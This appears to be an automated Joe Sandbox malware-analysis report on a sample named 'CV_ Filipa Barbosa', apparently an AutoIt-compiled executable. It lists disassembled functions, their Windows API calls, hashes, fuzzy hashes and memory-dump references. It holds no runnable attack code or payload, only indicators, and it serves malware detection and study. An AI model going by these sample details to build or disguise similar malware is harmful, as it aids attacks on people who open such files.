Opcode ID: 6cc325987a14d3f3d87e361cfd5f5c2b6787b0c727cda4fd867a0d471439a865
Instruction ID: 57ececd27580e588bf1a05b64f98931dd722583cd66cc7ad9ad6d64dd01b73fb
Opcode Fuzzy Hash: 6cc325987a14d3f3d87e361cfd5f5c2b6787b0c727cda4fd867a0d471439a865
Instruction Fuzzy Hash: DBF05E32005259BBDB23AFA4AC09FCA3F2DAF06311F044201FE15650E1877456A5CB95

Function 0032C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0032C85D
GetCurrentThreadId.KERNEL32 ref: 0032C864
AttachThreadInput.USER32(00000000), ref: 0032C86B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 124a5f348f453387264bfd159a0802f34cddbb59fdb89ce02482dae1d9698711
Instruction ID: 3558097fd6a307f501fb6bcb6af345f2433c90077243b4c00cda00417c3e7ca0
Opcode Fuzzy Hash: 124a5f348f453387264bfd159a0802f34cddbb59fdb89ce02482dae1d9698711
Instruction Fuzzy Hash: FDE0ED71541238BADB225BA2EC0DEDB7F6CEF167A1F818025B60D95461C6B1C5C1DBE0

Function 0032B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0032B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0032AC9D), ref: 0032B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0032AC9D), ref: 0032B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0032AC9D), ref: 0032B0F1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a05fdb3dbf60118433c2f52df4d813213a8d83dbd733eb9a7f973d23fb910cde
Instruction ID: 91e1db7128a04089d927f6e0ba99029dd342338b064d563631a1062b999c1d46
Opcode Fuzzy Hash: a05fdb3dbf60118433c2f52df4d813213a8d83dbd733eb9a7f973d23fb910cde
Instruction Fuzzy Hash: 8BE04F326012219BE7321FB16C0CB477BBCAF55791F028818A245DA040DB248481C760

Function 0030B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0030B496
SetTextColor.GDI32(?,000000FF), ref: 0030B4A0
SetBkMode.GDI32(?,00000001), ref: 0030B4B5
GetStockObject.GDI32(00000005), ref: 0030B4BD
GetWindowDC.USER32(?,00000000), ref: 0036DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0036DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0036DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0036DE6A
GetPixel.GDI32(00000000,?,?), ref: 0036DE8A
ReleaseDC.USER32(?,00000000), ref: 0036DE95

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 18c3c13c3d92f8020fdc581ac6b6883dec33831b89f6f48c1c5d50485c17c8b3
Instruction ID: 40b64453f848239e7f0f07d9793dc9efcf0061fbec5913cc6bd2597c66b60597
Opcode Fuzzy Hash: 18c3c13c3d92f8020fdc581ac6b6883dec33831b89f6f48c1c5d50485c17c8b3
Instruction Fuzzy Hash: A2E0ED31600244ABDB736B74AC09BD87B25AF52335F14C666FA79580E5C7B24981DB11

Function 0036B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0036B29A
GetDC.USER32(00000000), ref: 0036B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0036B2C3
ReleaseDC.USER32 ref: 0036B2E2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 233385cd9d8c1e2d194baf2c9966bda36c79abf17213632c022d73287be2d3f0
Instruction ID: fc7876bb4d8cdc730aaadab3a678dcbfee0bd3ef10583d0bb9a24fbaef54d098
Opcode Fuzzy Hash: 233385cd9d8c1e2d194baf2c9966bda36c79abf17213632c022d73287be2d3f0
Instruction Fuzzy Hash: 39E012B1100204EFEB125FB09848A2EBBBCEF4C350F21C80AF85E9B250CB7998808B40

Function 0032B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0032B2DF
UnloadUserProfile.USERENV(?,?), ref: 0032B2EB
CloseHandle.KERNEL32(?), ref: 0032B2F4
CloseHandle.KERNEL32(?), ref: 0032B2FC

Part of subcall function 0032AB24: GetProcessHeap.KERNEL32(00000000,?,0032A848), ref: 0032AB2B
Part of subcall function 0032AB24: HeapFree.KERNEL32(00000000), ref: 0032AB32

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 40b275791906236ea757cb88b3d0a3269882e3301c963b67e07740f1064f62fe
Instruction ID: 605a9303dd71b5d9ec3c4d623e2ffa35425de359474b9ff4a972ab6ae65c793a
Opcode Fuzzy Hash: 40b275791906236ea757cb88b3d0a3269882e3301c963b67e07740f1064f62fe
Instruction Fuzzy Hash: 15E0263A104405BBDB126FA5EC08859FBBAFF993217108621F62981575CB32A8B1EB91

Function 0036B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0036B2AE
GetDC.USER32(00000000), ref: 0036B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0036B2C3
ReleaseDC.USER32 ref: 0036B2E2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: cc95ad5e3dd2cd51b7cef4e00f9f3a11f817ef7d271ae7548d6928a95af50c15
Instruction ID: 4af9a30eb94e28689963b4137fffcfe4baf3fd776cf3d259d1192d92959251fc
Opcode Fuzzy Hash: cc95ad5e3dd2cd51b7cef4e00f9f3a11f817ef7d271ae7548d6928a95af50c15
Instruction Fuzzy Hash: DEE046B1500204EFDB129F70DC4CA2DBBBCEF4C350F118809F95E9B260CB79A8808B40

Function 0032DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0032DEAA

Strings

AutoIt3GUI, xrefs: 0032DE22
Container, xrefs: 0032DE29

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: bf10c97f87c4a7566f68c663aa083c58a922f8fe15b6131cd2a90892847511b9
Instruction ID: 7d48e9b23b7b4e54b440b6608f526d7f7a7e922d0bf9dabd4f35d26609d95a66
Opcode Fuzzy Hash: bf10c97f87c4a7566f68c663aa083c58a922f8fe15b6131cd2a90892847511b9
Instruction Fuzzy Hash: 94914674600611AFDB26CF68D884B6AB7B9FF49710F10846DF94ACF691DB70E841CB60

Function 0033290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00332A72

Strings

I/6, xrefs: 003329FC, 00332A64, 00332A12
I/6, xrefs: 0033297F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscpy
String ID: I/6$I/6
API String ID: 3048848545-433665731
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: beefeeb3d2a2e5d90206a3a137bdecbe67b609ca3b907045c1d2d772a0f73b74
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: 2441F73590021AABCF26EF98D4C1AFEB7B4EF18711F51505AF981AB191DB305E92C7A0

Function 0030BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0030BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0030BCF3

Strings

@, xrefs: 0030BCE8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: be8002a0d7096649a6e3dd1b44c6dc5d15b71ab1a5456b7992368560c6be6884
Instruction ID: 75eee5150419293c450169e00af7b6148e00fae0bd3602aff954fcba3ed656c2
Opcode Fuzzy Hash: be8002a0d7096649a6e3dd1b44c6dc5d15b71ab1a5456b7992368560c6be6884
Instruction Fuzzy Hash: A55133714097449BE321AF14DC8ABAFBBECFF95354F41484EF1C8450A6EB7085AC8752

Function 0033C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 002F44ED: __fread_nolock.LIBCMT ref: 002F450B

_wcscmp.LIBCMT ref: 0033C65D
_wcscmp.LIBCMT ref: 0033C670

Strings

FILE, xrefs: 0033C5A5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: c3e4ef6bd966809d32d96151f5735ea6f4149cf152372bfe8767176e35b97de9
Instruction ID: d069396a3fb2f93fd8372685b7de9d65c83697acd9c0cfc00b0dc945dcd1b016
Opcode Fuzzy Hash: c3e4ef6bd966809d32d96151f5735ea6f4149cf152372bfe8767176e35b97de9
Instruction Fuzzy Hash: 6E41D872A1020A7ADF21ABA4DC82FEFB7B9EF49714F001479F605FB181D6B19A148B51

Function 0035A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0035A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0035A86F

Strings

', xrefs: 0035A7C3

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 49f86183b0f177717d7f52b9d2637428e17b52c10ed237ecc7b9ab82919873be
Instruction ID: 4bb2493333709b698bcd3c50be3fc6fd5e3f36c79e93ebb87741a4132a659d24
Opcode Fuzzy Hash: 49f86183b0f177717d7f52b9d2637428e17b52c10ed237ecc7b9ab82919873be
Instruction Fuzzy Hash: 6441F774A006099FDB15CFA8C880FDABBB9FB08305F15016AEE05AB351D770A945DF91

Function 0035975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0035980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0035984A

Strings

static, xrefs: 003597AA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e933dffe7917fcc9bcee6b65ed1fcc3a3799e78168afd46081d66fe4c5ab5c12
Instruction ID: 13e96c3e4d275a4a6af2e2a117b858a1c97c2c08d8f3c820a4259aa291d5f1f0
Opcode Fuzzy Hash: e933dffe7917fcc9bcee6b65ed1fcc3a3799e78168afd46081d66fe4c5ab5c12
Instruction Fuzzy Hash: 0A316B71110604AAEB129F68CC80FBB73BDFF59765F01861AF9A9C71A0CA31AC85D760

Function 00335157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003351C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00335201

Strings

0, xrefs: 003351BF

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 611b73d66682e10b93e6b348cd9d366fd620d069b688f38621f9ff0d96651ecb
Instruction ID: c46c1cfe8521eac58a84e1c31a4f805176e0b483d8b6de2944d7bbbe8fb3ad15
Opcode Fuzzy Hash: 611b73d66682e10b93e6b348cd9d366fd620d069b688f38621f9ff0d96651ecb
Instruction Fuzzy Hash: 2431B431A007049FEB26CF99D8C5BAFBBF8FF45350F154819E985E61A0D7709A44CB50

Function 0034658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00346608

Strings

, $, xrefs: 00346648
AUTOITCALLVARIABLE%d, xrefs: 003465FA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 62eb6bb2f5e95a8902feb19612e61cd6c67ecd52b7eeffd1d669ff8e7c74ecb6
Instruction ID: df3eaaf68cab8e51ca453bfc1b22e9e5675a8dfee8d12ed6dfcc48b06ade379c
Opcode Fuzzy Hash: 62eb6bb2f5e95a8902feb19612e61cd6c67ecd52b7eeffd1d669ff8e7c74ecb6
Instruction Fuzzy Hash: 55219331610118AFCF16EF64D882EEEB7B5EF46340F010469F505AF181DB74EA55CBA6

Function 003593CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0035945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00359467

Strings

Combobox, xrefs: 00359429

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 261f4bdbcd4c06ea0d7b2204054d9cb47d945a8c632a6b74dc6dd26ecc41effe
Instruction ID: 32822db3afa91905942556ef504d7bd013b625fdb859db2cf7a62f167d43716e
Opcode Fuzzy Hash: 261f4bdbcd4c06ea0d7b2204054d9cb47d945a8c632a6b74dc6dd26ecc41effe
Instruction Fuzzy Hash: B21190B1200208AFEF26DF55DC80FBB376EEB883A5F110126FD189B2A0D6719C568760

Function 0035DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

GetActiveWindow.USER32 ref: 0035DA7B
EnumChildWindows.USER32(?,0035D75F,00000000), ref: 0035DAF5

Strings

T14, xrefs: 0035DAFB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T14
API String ID: 3814560230-1931324537
Opcode ID: f4ac135cb5208312aef38d22cbc5166948a06ef5a2c559535eae2210731d7c75
Instruction ID: bcd3166cda7061b61e104f968f28fc9c062fa41f3cf627b850a494b96e0f5f4b
Opcode Fuzzy Hash: f4ac135cb5208312aef38d22cbc5166948a06ef5a2c559535eae2210731d7c75
Instruction Fuzzy Hash: 3B211B79604205DFC726DF28D860AA6B7F9EF59321F650619ED6A873E0D730A844CBA0

Function 003598FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0030D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0030D1BA
Part of subcall function 0030D17C: GetStockObject.GDI32(00000011), ref: 0030D1CE
Part of subcall function 0030D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0030D1D8

GetWindowRect.USER32(00000000,?), ref: 00359968
GetSysColor.USER32(00000012), ref: 00359982

Strings

static, xrefs: 00359945

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: f730b9b3a38524ce50d06203a2109549cdd41e0e33c5f2a1cd5e76004b4f6741
Instruction ID: 49f3f233027d82a53d04f7a02ae5e3078e42d1fff25b5ee6155df2fe5d533d27
Opcode Fuzzy Hash: f730b9b3a38524ce50d06203a2109549cdd41e0e33c5f2a1cd5e76004b4f6741
Instruction Fuzzy Hash: 55114472520209AFDB16DFB8C845EEA7BB8EF08314F010629FD55E2250E734E854DB60

Function 00359617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00359699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003596A8

Strings

edit, xrefs: 0035967D

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 0e96c7a7c4d56bc62901743c7dc5103f6c262309cb1f1eb4153e092411c2a484
